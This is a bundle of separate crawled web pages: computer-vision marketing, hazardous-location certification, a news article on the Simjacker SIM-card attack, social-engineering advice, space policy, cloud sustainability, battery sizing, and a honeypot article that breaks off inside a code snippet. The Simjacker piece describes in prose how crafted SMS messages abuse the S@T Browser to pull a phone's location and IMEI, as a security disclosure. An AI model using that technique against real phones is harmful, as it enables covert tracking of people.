This is where computer vision can help. These systems automate PPE compliance monitoring for gloves, goggles, face shields, aprons, harnesses, hardhats, and more. They can identify all workers without PPE as soon as the compliance failure happens—sending real-time alerts to shift managers.
By boosting PPE compliance through improved monitoring, computer vision offers the high ROI of significantly reducing the number and severity of serious workplace accidents and injuries.
The above ROIs are only a few ways computer vision benefits manufacturing. Here is a summary of the most important computer vision ROIs for manufacturing, including some that have not been mentioned yet:
In addition to some of the ROIs referenced above, energy firms are using computer vision to optimize the following:
Successful monitoring of key infrastructure for predictive maintenance purposes is a high priority for large-scale energy operations. Unfortunately, human inspectors are prone to mistakes, misjudgments, and errors. It is also costly and dangerous to transport inspectors to remote locations, resulting in infrequent inspections.
In contrast, computer vision uses a network of cameras and sensors to inspect infrastructure components 24 hours a day—whether they are close by or in remote locations. Computer vision solutions can also deploy airborne inspection drones to monitor pipeline assets across large distances. With greater accuracy and cost-efficiency than human inspectors, these systems detect problems long before dangerous or costly incidents occur.
Deploying computer vision security solutions at remote oil and gas sites increases overall site security. The increased 24/7 monitoring that computer vision provides is also valuable at manned sites, especially after hours when workers are not present—or when it is challenging for security personnel to provide sufficient coverage.
Computer vision models for oil and gas site security achieve the following:
Oil and gas firms need to comply with strict rules from the Environmental Protection Agency (EPA); Environmental, Social, Governance (ESG); Socially Responsible Investing (SRI); and other organizations.
Nevertheless, unintentional violations of these environmental rules are common. In many cases, this is due to the difficulty in monitoring oil and gas sites in remote areas frequently. For example, the accidental discharge of untreated water into a waterway could continue for weeks or months before a human inspector arrives and takes notice.
By automating environmental law compliance monitoring at remote sites, computer vision offers 24/7 real-time alerts when the compliance issue appears. This empowers firms to fix environmental concerns before they result in costly damages, lawsuits, fines, and reputation damage.
The above ROIs are an example of the ways computer vision benefits the oil and gas industry. Below is a summary of the most important ROIs for oil and gas:
Similar to the industries above, computer vision offers clear ROIs for healthcare in the following areas:
Patient misidentification errors cost hospitals approximately $17.4 million in losses per year in denied insurance claims related to fatal and harmful injuries. Computer vision can dramatically reduce these errors—and reduce their damaging and costly consequences—by using real-time face identification to authenticate the identities of patients during every interaction with medical staff.
Computer vision platforms, such as Chooch, can also achieve HIPAA compliance and all seven levels of PACS integration to meet the strictest healthcare industry data privacy and data security requirements.
When doctors, radiologic technologists, and diagnosticians evaluate radiology images, the smallest oversight can result in a mistaken diagnosis. Unfortunately, these misdiagnoses are all too common—resulting in improper treatment protocols and poor patient outcomes.
To make matters worse, the U.S. Bureau of Labor Statistics predicts serious staffing shortages for radiologic and MRI technologists in the coming years, putting more stress on existing staff—and potentially increasing the chances of misdiagnosis.
Computer vision can relieve these staffing burdens while helping diagnosticians achieve more accurate results. In fact, a recent study in the journal Nature found that computer vision algorithms provided more accurate results than the average human reader (by an absolute margin of 11.5%) when analyzing mammography images for signs of breast cancer. When working with a human partner to provide “double-readings,” these AI systems reduced the workload of human readers by 88%.
In addition to the above study, another investigation showed that a medical AI neural network trained on images of lung X-rays was able to diagnose COVID-19 cases with 98% accuracy.
Computer vision for medical diagnosis frees radiologic technologists to dramatically improve the speed and accuracy of their work. This technology has the capacity to become an essential element of medical infrastructure in the years ahead.
The above ROIs are only a few of the ways computer vision benefits healthcare. Here is a summary of the most important ROIs for healthcare, including additional use cases that were not mentioned:
According to a 2020 survey, 59% of healthcare executives project that they will receive a full return on their medical AI investments in less than three years.
Retail stores are leveraging computer vision to take advantage of many of the ROIs mentioned above—in addition to reducing shrink, improving customer experiences, and optimizing their multichannel operations.
Here are three areas where retail stores are experiencing unique ROI advantages:
Out-of-stock items decrease sales, hurt consumer satisfaction and interfere with customer loyalty. According to Harvard Business Review, “stock-outs cause walk-outs.” 21-43% of customers will choose to shop somewhere else when they cannot readily find the items they want. More poignantly these abandoned sales cause annual losses of approximately 4% for retailers.
Computer vision solutions help reduce out-of-stock items by notifying retail employees when shelves are out of stock and need re-organizing/tidying. These systems also automate inventory reordering so key items are never out of stock.
Walmart has already experimented with computer vision strategies that use “shelf-scanning robots” that search for product supply irregularities. These AI-powered stock-out monitoring solutions offer better awareness of out-of-stock items while freeing up human employees to focus more strategically on restocking shelves and providing the best customer service.
he insights gained from tracking consumer behavior on smartphones have helped retailers dramatically improve the quality of their customers’ online experiences. Computer vision is now empowering a similar kind of revolution in customer experience improvement at physical stores. With computer vision’s capacity to track the detailed nuances of virtually any consumer behavior and interaction in retail stores, computer vision offers deep, real-time insights into the following:
With its revolutionary capacity to track and derive insights from minute customer behaviors, computer vision is empowering retailers to optimize customer interactions, customer satisfaction, and retail sales efficiency like never before.
Shoplifting and employee theft cause over 60% of inventory shrinkage in retail. One of the most common factors that lead to retail theft is a lack of restrictions on employee-only zones like stockrooms, offices, and break rooms—and/or the inability to monitor these areas and enforce the restrictions. Another common problem happens when check-out clerks aid shoplifters by purposefully failing to scan items.
Computer vision for retail loss prevention offers the following solutions:
The above ROIs are only a few of the ways computer vision benefits the retail industry. Here is a summary of the most important computer vision ROIs for retail, including additional use cases that were not mentioned:
Computer vision for retail achieves the following ROIs:
The above use cases for computer vision in retail yield higher profits, reduced inventory shrinkage, better customer behavior tracking, improved security, fewer labor costs, actionable data-driven insights, and dramatically greater process efficiency. In the years ahead, retailers can expect to see even more applications of this exciting technology in their industry.
Computer vision technology provides high business ROIs across many use cases and industries. Due to its capacity to achieve virtually any task that requires human eyes, human expertise, and human understanding—with greater speed, accuracy, consistency, cost efficiency than humans—this technology is radically transforming the ROI potential of every sector it touches. Now, computer vision solutions are rapidly deployable to businesses seeking exponential improvements in the areas of safety, security, quality assurance, patient outcomes, customer experience, industrial maintenance, and so much more.
At Chooch, we work closely with our ecosystem partners and customers to ensure high ROIs for each one of their computer vision initiatives. In the years ahead, as more businesses recognize the transformative power of computer vision, we look forward to helping firms across all industries—including manufacturing, energy, logistics, warehousing, retail, healthcare, construction, and other sectors—achieve exponentially better outcomes.
If you would like to learn about how computer vision can overcome unique challenges in your industry, contact our team and schedule a demo of the Chooch platform now. | <urn:uuid:b0d5d253-fc4f-499d-b351-7ed97fb2197a> | CC-MAIN-2022-40 | https://chooch.ai/ai-roi-paper/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334871.54/warc/CC-MAIN-20220926113251-20220926143251-00118.warc.gz | en | 0.92873 | 3,200 | 2.84375 | 3 |
Learn about CID1 and CID2 intrinsic safety certification and how Getac ANSI/UL certified tablets and laptops can help you work in hazardous environments.
What is CID2?
“Class 1 Division 2” is a classification for dangerous environments where fire hazards such as flammable gases, vapors, or liquids exist. CID2 classifications were established by the National Fire Protection Association’s Publication 70 and clarify the different classes and divisions of hazardous sites. In CID2 conditions, devices and equipment that meet CID2 standards minimize the risk for spark, ignition, or explosion. These standards and ATEX certifications verify similar degrees of protection, with CID2 used most commonly in North America and ATEX used in Europe.
CID1 vs CID2
CID2 is not the only explosive atmosphere classification. The governing classification system includes three classes and two divisions differentiating the level of explosive or otherwise dangerous gases, vapors, and mists present.
A explosive environment’s class is determined by the type of hazardous material present in the air.
Class 1: Gases, Vapors, and Mists
Class 2: Combustible Dust
Class 3: Easily ignitable fibers, or flyings.
Division is decided by the consistency of hazards present in the environment.
Division 1: Hazards are present in the air during normal operating conditions.
Division 2: Hazards are present in the air for limited amounts of time during system failures or faults.
With this system, the difference between a CID1 and CID2 environment is whether explosive materials are present consistently (CID1) or if they are usually contained in closed canisters or systems, and only exposed during a system failure (CID2).
Graphic Recommended to demonstrate classification system similar to the one below
Where are CID2 Certifications Required?
Flammable particulates can be found in many industries. Any industry that deals with chemicals or combustible materials should use CID2-certified devices to protect workers and business assets. Industries that require CID2 certification include chemical makers, oil and gas companies, mining operations, and industrial and automotive manufacturers.
UL & C-UL Certification
CID2 certification can be done with the help of UL (Underwriters Laboratories), a safety science leader and non-profit testing organization that evaluates, tests, and certifies devices built for hazardous locations. Their testing standards ensure that any certified device follows the standards of UL, American National Standards Institute (ANSI), and CSA standards provide enhanced safety in certain workplaces.
UL & C-UL Markings
If certified for use in a hazardous area, devices will be marked with a UL label. These labels include further subdivisions that certify the types of hazardous materials that devices are protected against, and their temperature classes.
Getac CID2 Certified Rugged Computing Solutions
Getac offers a broad variety of rugged and intrinsically safe laptops and tablets that make field professionals working in explosive atmospheres more productive, without compromising safety. | <urn:uuid:d7010beb-fcbf-4c60-96fd-2e2c07b09234> | CC-MAIN-2022-40 | https://www.getac.com/us/certifications/c1d2-certification/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334871.54/warc/CC-MAIN-20220926113251-20220926143251-00118.warc.gz | en | 0.901797 | 648 | 3.171875 | 3 |
A modern smartphone is less a phone than it is a collection of small computers housed in a very expensive glass and polished metal case. Those computers run a variety of software, much of which is invisible to the user, and software has bugs, some of which can be exploited in devastating ways.
Researchers have uncovered an arcane vulnerability in a piece of software buried deep in many mobile phones that can allow an attacker to gain control of a target phone surreptitiously, simply by sending a malicious SMS to the phone. The attack has been used by at least one group against victims in several countries and does not require the victim to click on a link in the message or visit an attacker-controlled website. The SMS contains a set of instructions for the SIM card, which is a tiny computer that gives the phone its identity and allows it to access data networks. Some cards hold a number of different applications on them that control low-level operations for the device. The attack that researchers at AdaptiveMobile Security observed and have named Simjacker exploits an issue with the SIMalliance Toolbox Browser, or S@T browser, an older piece of software on some SIM cards on GSM networks.
The researchers said they have seen the attack targeting phone numbers from a number of different countries. The specific attack that AdaptiveMobile has observed requires the target device to have the S@T Browser on the SIM card and to accept the kind of SMS messages that carry the instructions.
“This Simjacker Attack Message, sent from another handset, a GSM Modem or a SMS sending account connected to an A2P account, contains a series of SIM Toolkit (STK) instructions, and is specifically crafted to be passed on to the UICC/eUICC (SIM Card) within the device. In order for these instructions to work, the attack exploits the presence of a particular piece of software, called the S@T Browser - that is on the UICC,” Cathal Mc Daid, CTO of AdaptiveMobile, wrote in a post explaining the vulnerability and attack scenario.
“Once the Simjacker Attack Message is received by the UICC, it uses the S@T Browser library as an execution environment on the UICC, where it can trigger logic on the handset. For the main attack observed, the Simjacker code running on the UICC requests location and specific device information (the IMEI) from the handset. Once this information is retrieved, the Simjacker code running on the UICC then collates it and sends the combined information to a recipient number via another SMS (we call this the ‘Data Message’), again by triggering logic on the handset. This Data Message is the method by which the location and IMEI information can be exfiltrated to a remote phone controlled by the attacker.”
"In short, the advent of Simjacker means that attackers of mobile operators have invested heavily in new attack techniques."
The result of the attack is that the remote adversary has access to a wide range of information on the exploited phone, including real-time location data, and also has the ability to send texts, make calls, open apps, and take other actions on the device. Mc Daid said most of the devices that the company has observed being targeted are attacked just once a week, although a small number are hit several times per week. This suggests that the attackers are not maintaining persistent access to the devices once they’re exploited.
“A few phone numbers, presumably high-value, were attempted to be tracked several hundred times over a 7-day period, but most had much smaller volumes. A similar pattern was seen looking at per-day activity, many phone numbers were targeted repeatedly over several days, weeks or months at a time, while others were targeted as a once-off attack,” Mc Daid said.
“These patterns and the number of tracking indicates it is not a mass surveillance operation, but one designed to track a large number of individuals for a variety of purposes, with targets and priorities shifting over time.”
Mc Daid, who plans to present more details on the vulnerability and attack at the Virus Bulletin conference next month, said the company has been working with mobile providers and network operators to address and mitigate the threat.
“We believe that the Simjacker attack evolved as a direct replacement for the abilities that were lost to mobile network attackers when operators started to secure their SS7 and Diameter infrastructure. But whereas successful SS7 attacks required specific SS7 knowledge (and access), the Simjacker Attack Message require a much broader range of specific SMS , SIM Card, Handset, Sim Toolkit, S@T Browser and SS7 knowledge to craft,” Mc Daid said.
“This investment has clearly paid off for the attackers, as they ended up with a method to control any mobile phone in a certain country, all with only a $10 GSM Modem and a target phone number. In short, the advent of Simjacker means that attackers of mobile operators have invested heavily in new attack techniques, and this new investment and skillset means we should expect more of these kinds of complex attacks.” | <urn:uuid:7a9eb970-1ed7-4224-af26-585cd14fda94> | CC-MAIN-2022-40 | https://duo.com/decipher/simjacker-attack-exploits-deep-seated-weakness-in-phones | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335058.80/warc/CC-MAIN-20220927194248-20220927224248-00118.warc.gz | en | 0.953933 | 1,081 | 2.75 | 3 |
As prevalent as cybersecurity threats unfortunately are today, many users tend to overlook major threats that they just aren’t focused on nearly as much: social engineering attacks. Social engineering attacks are just another means for a cybercriminal to reach their desired ends, and therefore needed to be protected against.
What is Social Engineering?
Social Engineering is the act of manipulating people into providing access credentials to criminals that aren’t supposed to have access to a system. To do this, the social engineer uses his/her influence (real or not) to trick people into supplying the needed information.
The act of social engineering can be approached in multiple ways. Hackers can take advantage of user carelessness, they can come in as a helpful party, they can take advantage of an individual’s fear, and they can exploit a person’s comfort zone. Let’s take a look at each.
Despite the need for information systems, companies largely depend on individual users to secure their own endpoints. Sure, they will put in place a set of tools designed to keep network resources secure, but overall, it is important for each user to maintain vigilance over their own workstation and other network-attached devices. If they aren’t, scammers can obtain access fairly easily.
If they can’t use spam or phishing messages to gain access, they may have to try an alternate method. For example, a scammer may gain access to your workspace. If your people ignore best practices for convenience and leave credentials or correspondence out in the open, a scammer looking for things like this will be able to leverage that mishap into access most of the time.
Most people will help people that are having trouble. The impulse to be helpful can be taken advantage of if the “victim” is a hacker. People can hold the door for a cyberthief giving them access to your office. They can use information syphoned from the web to gain a person’s trust and then use the trusting nature of good people for nefarious means. Moreover, it is natural to want to help someone, so you and your staff have to be careful that they are, in fact, in need of help and not looking to steal access to company resources.
Working Within the Comfort Zone
Most workers do what they are told. If they have somewhat repetitive tasks, they may grow complacent. Social engineering tactics will take advantage of this, especially at a large company. The scammer will get into your office and if some employees are used to random people just milling around, they won’t really pay any mind.
We typically like to think about hackers as loners that sit in the dark and slurp energy drinks while they surf the Dark Web. While this description is fun, it’s not realistic. Hackers, the ones that you should be worried about, know your company’s weakest points and will take advantage of them. If that weakest link is the complacency of your employees, that will be the way they will approach it. Unfortunately, this also technically includes insider threats.
Getting someone to do something out of fear is effective, but can be risky. The more fear someone has, the more they will look to others to help mitigate it. That’s why most fear tactics, nowadays, come in the form of phishing messages. Using email, instant messaging, SMS, or other means to get someone worried enough to react to a threat takes a believable story that could produce an impulsive reaction by a user. Fear has long been known to be a powerful motivator, so it really is no surprise that cybercriminals would resort to this means to coerce their targets into compliance.
We Can Help
If you would like more information about social engineering or any other cybersecurity issue, contact the IT experts at CTN Solutions at (610) 828- 5500. | <urn:uuid:f4d8b968-22f4-4b4d-94ef-0c5aabb8a735> | CC-MAIN-2022-40 | https://ctnsolutions.com/social-engineering-and-your-business/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335304.71/warc/CC-MAIN-20220929034214-20220929064214-00118.warc.gz | en | 0.954049 | 817 | 3.296875 | 3 |
The White House National Space Council has released a new strategy that seeks to protect the Earth and other planetary bodies from biological contamination associated with space exploration activities and ensure safe and sustainable commercialization and exploration of space.
The National Strategy for Planetary Protection has three objectives and the first calls for the U.S. to avoid “forward contamination” through the development and implementation of risk assessment and science-based guidelines and an update to the interagency payload review process.
The second objective seeks to prevent “backward contamination” through the development of a Restricted Return Program, while the last objective calls for the incorporation of the private sector’s needs and perspective through feedback solicitation and creation of guidelines for private sector activities.
For the first objective, the government should come up with a forward contamination framework and risk-informed decision-making implementation strategies for human missions within one year.
“Meeting the strategy’s objectives will ensure a cohesive national effort that balances scientific discovery, human exploration, and commercial activity in space, while meeting applicable international and domestic obligations,” the strategy’s fact sheet reads. | <urn:uuid:d1685663-313a-42a4-b646-6a4258d46ecc> | CC-MAIN-2022-40 | https://executivegov.com/2021/01/white-house-issues-national-strategy-for-planetary-protection/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335469.40/warc/CC-MAIN-20220930113830-20220930143830-00118.warc.gz | en | 0.88649 | 229 | 2.875 | 3 |
What Cloud Computing Can Do For Sustainability
As organizations increasingly move their data and applications to cloud-based models, the opportunities for sustainable business practices abound. Cloud service providers have made great strides in incorporating renewable energy sources into their data center infrastructure, reducing consumption of natural resources, and improving the efficiency of their operations. For businesses looking to adopt more sustainable practices, cloud computing can provide an important pathway to success.
Cloud computing has the potential to play a major role in sustainability. Its ability to improve resource utilization and decrease emissions makes it an attractive option for organizations looking to reduce their environmental impact. Additionally, cloud computing can help organizations save money by reducing energy costs and improving operational efficiency.
Despite these potential benefits, there are still many challenges that need to be addressed before cloud computing can truly become a sustainable solution. One of the biggest challenges is ensuring that data centers are powered by renewable energy sources. Data centers are extremely energy-intensive, and as more and more businesses move to the cloud, the demand for renewable energy will only increase. Additionally, it is important to ensure that data center infrastructure is designed for efficiency and scalability. Scalable infrastructure will be essential as the demand for cloud services grows.
The Application of Cloud Computing for Sustainability
Cloud computing is an emerging area of information technology that holds great promise for sustainability. Cloud computing has already begun to play a significant role in sustainability initiatives across the globe. For example, it has been used to increase energy efficiency in data centers, create virtual power plants, and enable real-time monitoring of energy use. Moreover, cloud-based applications and services can help organizations reduce their paper consumption, travel costs, and carbon footprints.
The potential benefits of cloud computing for sustainability are vast. However, there are also some challenges that need to be addressed, such as data security and privacy, energy use, and environmental impact.
Despite the challenges, cloud computing offers a tremendous opportunity to accelerate progress towards a more sustainable future. With its ability to provide organizations with flexible resources and economies of scale, cloud computing can help reduce their environmental impact and enable them to operate more efficiently and sustainably.
How Cloud Computing is Used for Sustainability
Cloud computing is an emerging technology that enables organizations to reduce their reliance on traditional, on-premises IT infrastructure. Additionally, cloud computing can help organizations improve their sustainability performance by enabling them to optimize energy use and reduce carbon emissions.
In recent years, a number of companies have begun using cloud computing to support their sustainability initiatives. For example, Walmart has used the technology to create an “Eco-mart” prototype store that uses 20% less energy than a traditional store. Similarly, Coca-Cola has used cloud computing to design more energy-efficient coolers for its products.
Many experts believe that cloud computing will play a significant role in helping organizations achieve their sustainability goals. As more companies adopt the technology, it is likely that its impact on sustainability will continue to grow.
Benefits of Using Cloud Technologies for Sustainability Efforts
Cloud technologies offer a number of advantages for sustainability efforts. One key benefit is the ability to rapidly scale up or down as needed, which can help organizations save on energy costs. Additionally, cloud-based solutions often offer greater flexibility and agility than traditional on-premises options, making it easier for organizations to respond quickly to changes in market conditions or customer needs.
Another advantage of using cloud technologies is that they can help organizations improve their carbon footprint. For example, by moving data and applications to the cloud, companies can reduce their reliance on energy-intensive data centers. In addition, many cloud providers offer green computing options, such as using renewable energy to power their facilities.
Finally, cloud technologies can also help companies better measure and manage their environmental impact. For instance, by using cloud-based monitoring and reporting tools, organizations can track their energy usage and emissions in real-time. This information can then be used to identify areas where improvements can be made.
Overall, cloud technologies offer a number of benefits for sustainability efforts. By reducing energy costs, increasing agility, and improving carbon management, they can help organizations meet their environmental goals.
It Reduces Energy Consumption
Cloud computing has been one of the most game-changing innovations in recent history. Not only has it made it possible for businesses to operate more efficiently, but it has also had a profound impact on helping to reduce energy consumption.
One of the key ways that cloud computing reduces energy consumption is through its use of virtualization. Virtualization is the process of creating a virtual version of something, such as a server, storage device, or network resource. By using virtualization, businesses can run multiple applications and services on a single physical server, which reduces the need for additional hardware and corresponding energy consumption.
In addition to reducing energy consumption through virtualization, cloud computing also helps by making data center operations more efficient. Data centers are notoriously energy-intensive, and by migrating to the cloud, businesses can take advantage of more efficient data center technologies and practices, such as using serverless computing or green data centers.
Overall, cloud computing provides a number of benefits that help to reduce energy consumption. By using virtualization and more efficient data center operations, businesses can save energy and help to protect the environment.
It is Powered by Renewable Energy
Cloud computing is powered by renewable energy to help the environment. This is done by using data centers that are powered by renewable energy sources, such as solar and wind power. Cloud computing also helps to save energy by using virtualization technologies. Virtualization allows multiple computers to share the same physical resources, which reduces the amount of energy used overall. Additionally, cloud computing can help organizations reduce their carbon footprints by enabling them to use less paper and travel less.
It Reduces Greenhouse Gas Emissions
Cloud computing has been shown to be a major driver of reducing greenhouse gas emissions. In fact, a recent study by the Carbon Disclosure Project found that organizations using cloud services reduced their carbon dioxide emissions by an average of 18 percent.
The report also found that the use of cloud services helped organizations improve their energy efficiency by an average of 24 percent. And perhaps most importantly, the study showed that the use of cloud services could help reduce an organization’s overall carbon footprint by up to 90 percent.
So how does cloud computing help reduce greenhouse gas emissions? There are a few key ways.
First, when you use cloud services, you don’t have to run your own servers or data centers. This means you don’t have to use as much electricity, which in turn reduces your carbon footprint.
Second, cloud providers are often able to utilize renewable energy sources, such as solar and wind power, to power their data centers. This means that your carbon footprint is further reduced when you use cloud services.
Lastly, cloud providers often have very efficient data centers that use less energy than traditional data centers. This efficiency results in lower carbon dioxide emissions.
So if you’re looking for ways to reduce your organization’s carbon footprint, consider using cloud services. You’ll be doing your part to help the environment while also benefiting from the many other advantages of cloud computing.
Frequently Asked Questions
It Results in Dematerialization
One of the most important ways in which cloud computing can help the environment is through dematerialization. Dematerialization is the process of reducing the number of physical materials used in a product or service. When applied to computing, it refers to reducing the need for physical hardware and other resources by using cloud-based solutions.
There are many benefits of dematerialization, but one of the most important is that it can help reduce waste and conserve resources. For example, when a company uses cloud-based applications, they don’t need to use as much paper because everything is stored electronically. This not only saves trees and other resources but also reduces greenhouse gas emissions from transportation and manufacturing.
Another benefit of dematerialization is that it can help reduce energy consumption. When data is stored electronically, it doesn’t need to be accessed as often, which means that servers and other computing resources can be turned off or used less frequently. This can lead to significant reductions in energy use and associated emissions.
Finally, dematerialization can also help improve security and resilience. When data is stored in the cloud, it can be backed up and replicated more easily than if it were stored on physical hardware. This makes it less likely that data will be lost in the event of a disaster, such as a fire or a flood. And because cloud-based solutions are often updated automatically, they can provide better security against emerging threats.
Cloud computing has already had a major impact on the environment, and this is likely to continue as more companies and individuals adopt cloud-based solutions. As we move toward a more sustainable future, dematerialization will play an increasingly important role in helping us to reduce our reliance on physical resources and conserve energy.
What Kinds of Applications Are Being Used on the Cloud?
There are many different types of applications that are being used on the cloud for sustainability and environmental protection. Some of these applications are designed to help businesses save energy and reduce their carbon footprint, while others are created to help individuals track their own energy use and make more sustainable choices.
Some popular applications for sustainability include:
- GreenButton: This application helps businesses save energy by allowing them to monitor and manage their electricity use.
- Eco-Trip Planner: This application helps individuals plan more sustainable trips by providing information on the most eco-friendly transportation options, routes, and accommodations.
- Sustainable Seafood Guide: This application provides information on which seafood items are sustainably caught or farmed so that consumers can make more sustainable choices when purchasing seafood.
- Greenhouse Gas Emissions Calculator: This application allows businesses and individuals to calculate their emissions so that they can take steps to reduce them.
- Sustainable Agriculture Information: This application provides information on sustainable agriculture practices so that farmers can adopt more eco-friendly methods.
These are just a few of the many different types of applications that are available for sustainability and environmental protection. By using these applications, businesses and individuals can save energy, reduce their carbon footprint, and make more sustainable choices.
Cloud computing has the potential to provide sustainable solutions for many of our society’s most pressing issues. From reducing energy consumption and greenhouse gas emissions to enabling more efficient use of resources, cloud-based systems have the ability to make a real difference. If you are interested in learning more about how your organization could benefit from Cloud Computing Technologies with regard to sustainability, please get in touch. We would be happy to discuss your specific needs and see how we can help you achieve your sustainability goals.
Space Exploration Informs Deep Sea Robot
A team of ex-NASA roboticists used learnings from space exploration robots to create machines capable of withstanding an equally difficult-to-access and underexplored environment: the deep ocean.
Nauticus Robotics, a Houston-based developer of cloud-based subsea robots, has applied some of the same learnings gleaned from work on NASA’s space exploration robot Robonaut 2 to create an autonomous deep-sea robot.
“What NASA taught us is to put together robust software autonomy with a capable hardware morphology and deploy it in a remote setting,” said Nic Radford, founder and CEO of Nauticus. Radford worked as a deputy project manager and chief engineer for the humanoid robot Robonaut 2 during his 14 years at NASA, though he has since turned his capabilities to ocean exploration.
Robonaut 2 was a perfect demonstration of how robots could be designed and deployed in previously inaccessible environments while remaining as autonomous as possible to ease operator control down on Earth. The robot’s design featured tendon-powered hands, elastic joints, and miniaturized load cells, as well as vision systems, force sensors, and infrared sensors to gather information. Finally, it was also kitted out with image-recognition software, control algorithms, and ultra-high-speed joint controllers to process and action data. All this allowed it to gain a level of interaction with and understanding of its environment that enabled a high level of autonomy.
“Even if you’re putting it on the space station and controlling it from the ground, there’s not a high-speed data network. Talking to the space station to control the robot is more akin to using dial-up,” said Radford.
Designing a robot for the deep ocean relies on some of the same principles: creating one that can withstand harsh conditions and that understands its environment well enough to make up for communication difficulties with a remote team. Indeed, given the distance between operator and robot, the company's Aquanaut had to be able to perceive and interact with its surroundings as autonomously as possible, with the least amount of operator input.
Nauticus’ Aquanaut is entirely electric and the size of a small car, and the suite of cameras and sensors placed in the “nose” of the robot gives it a heightened sense of its surroundings that allows it to work with minimal supervision. Its arms can be customized to feature different tools, depending on the task at hand.
The robot has a number of potential applications such as service and maintenance on offshore oil wells and wind turbines, as well as aquaculture, an industry slated to grow as solutions to feed growing global populations become increasingly necessary.
“Space is amazing because it feels existential – it’s way out there, and people want to explore it,” Radford adds. “But it turns out there are also many real challenges right here beneath the ocean, and we could stand to do more innovating in the ‘blue economy.’”
The following steps can be used to estimate the size of a battery bank for a stand-alone PV system (and other systems).
1. Calculate the average daily AC load in Wh per day (this is done before battery bank sizing, using utility electric bills or by adding up the watts for each item that uses power).
2. Divide step 1 by inverter efficiency.
3. Divide step 2 by system DC voltage.
4. Step 3 is the average (required) Ah per day.
5. Multiply step 4 by days of autonomy.
6. If using lead-acid batteries, multiply step 5 by the temperature multiplier (see note 1).
7. Divide step 6 by percent DOD (if not using lead-acid batteries, divide step 5 by percent DOD).
8. Divide step 7 by (selected for the system) battery Ah rating.
9. Step 8 is the number of batteries required in parallel.
10. Divide system DC voltage by battery voltage (see note 2).
11. Step 10 is the number of batteries required in a series string.
12. Multiply step 11 by step 8.
13. Step 12 is the total number of batteries required in the battery bank.
Note 1: This is a derating factor based on the lowest ambient temperature of the battery bank and is usually in the battery specification.
Note 2: As an example, the system DC voltage is selected as 24V and the battery voltage as 12V; therefore, two batteries per series string are required. This criterion is part of the design selection process.
Battery Bank Sizing Example
Design a battery bank backup system for a PV- array stand-alone system (see Figure 1). The system output is AC supplied by an inverter. Batteries will supply power on days of autonomy and at night.
• Load requirement: 14 kWh per day
• Days of autonomy: 2
• Battery system: 24V
• Battery spec.: 12V at 250 Ah lead-acid deep-cycle
• DOD: 70%
• Lowest ambient temperature: 40°F (1.3 temperature multiplier)
• Inverter efficiency: 90%
Note: In Figure 1, the area for battery bank sizing is within the dotted line. The array must supply power to meet the charging and system requirements when the array is generating power, and this is calculated when the array size is determined. When sufficient power cannot be generated by the array to meet total demand, then only critical loads will be supplied. In this circumstance, a motor generator is often used to supplement power requirements.
Figure 1 Stand-alone configuration with battery backup
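For readers who want to script the procedure, below is a small Python sketch (ours, not part of the original method) that walks the worked example through steps 1-13. Rounding the parallel-string result up to a whole battery is our assumption, since the steps only say to divide.

```python
from math import ceil

def battery_bank_size(load_wh_per_day, inverter_eff, system_v,
                      days_autonomy, temp_multiplier, dod,
                      battery_ah, battery_v):
    """Size a lead-acid battery bank following steps 1-13 above."""
    ah_per_day = load_wh_per_day / inverter_eff / system_v      # steps 2-4
    required_ah = ah_per_day * days_autonomy * temp_multiplier  # steps 5-6
    required_ah /= dod                                          # step 7
    parallel = ceil(required_ah / battery_ah)                   # steps 8-9 (rounded up to whole batteries)
    series = round(system_v / battery_v)                        # steps 10-11
    return parallel, series, parallel * series                  # steps 12-13

# Worked example from the text: 14 kWh/day, 90% inverter efficiency, 24 V system,
# 2 days of autonomy, 1.3 temperature multiplier, 70% DOD, 12 V / 250 Ah batteries.
parallel, series, total = battery_bank_size(14_000, 0.90, 24, 2, 1.3, 0.70, 250, 12)
print(parallel, series, total)  # -> 10 strings in parallel, 2 batteries per string, 20 batteries total
```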
Most of our modern conveniences rely on the stable delivery of electricity. But that wasn’t always possible. Like every technology, someone had to invent it. In fact, two men invented two different systems. One inventor has a familiar name, Thomas Edison. You may not know much about the other, Nikola Tesla. Learn about him and his battle with a not-always-nice Edison.
When it comes to cyber attacks and intrusions, time is of the essence! Being able to detect them early on is crucial, and techniques like honeypots can make your cyber security team very quick on their feet. Keep reading to learn more!
When an intruder finds their way into your systems, they do their best to be stealthy since your cyber security team cannot do anything to stop the attack if they don’t even know about it! That is why being able to detect even the attempt of an attack is very important if you want to quickly contain and stop it before it does any actual harm to your organization.
For the future and wellbeing of your business and the safety of your sensitive information, having proper network intrusion detection is essential, and a honeypot aims to offer you exactly that. In this article we will discuss what a honeypot is and how it can be used for network intrusion detection.
What is a honeypot?
A honeypot can be defined as a mechanism or structure that serves as a trap for attackers. It mimics the actual targets of cyber attacks; as a result, it is able to lure attackers in.
A honeypot can be used for educational purposes or security purposes. For the former, the cyber security team of the organization sets up the honeypot. After an attacker or a group of attackers target it to exploit its vulnerabilities, the team examines the honeypot and which vulnerabilities are exploited in order to learn from this experience and enhance the security posture of their organization.
When used for the security purposes, the honeypot acts as a decoy. It distracts the attackers from the actual, valuable resources of the organization and costs them time.
How to use honeypot for network intrusion detection
As we discussed above, honeypots can be used for educational purposes, but also they can easily be implemented into network intrusion detection systems.
The principle for incorporating honeypots into network intrusion detection is very simple: the honeypot lures the intruder and costs them a significant amount of time. After the attack attempt is contained, the information provided by the honeypot is analysed in detail. The honeypot can tell us how the attacker detected the vulnerabilities in the organization's security posture, how they exploited those vulnerabilities, and other valuable information. In other words, the honeypot allows cyber security professionals to observe the actions of the attacker.
With the information provided by the honeypot, the cyber security team can enhance and upgrade the security posture of your organization. A honeypot offers insight into the motivation of the attackers, which tools they used, and so forth.
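As a purely illustrative sketch, the Python snippet below implements a minimal low-interaction honeypot: it listens on an otherwise unused port, never serves real data, and logs every connection attempt for later analysis. The port number and log file name are arbitrary choices for the example, not recommendations.

```python
import socket
from datetime import datetime, timezone

HONEYPOT_PORT = 2222          # an otherwise unused port; any connection to it is suspicious
LOG_FILE = "honeypot.log"     # forward this log to your SIEM for alerting and analysis

def run_honeypot():
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as server:
        server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
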